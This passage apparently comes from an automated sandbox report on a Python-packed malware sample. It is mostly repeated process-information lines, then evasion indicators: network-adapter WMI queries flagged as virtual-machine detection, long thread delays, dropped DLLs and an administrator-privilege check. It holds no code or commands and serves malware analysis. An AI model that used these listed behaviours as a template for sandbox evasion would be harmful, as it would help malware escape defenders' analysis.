              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 455Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4899Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4440Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 353Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4550
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1301
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3420
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1705
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5989
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1029
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3685
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1727
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2743
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1273
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3192
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 809
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_lzma.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\python311.dllJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76002\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17488
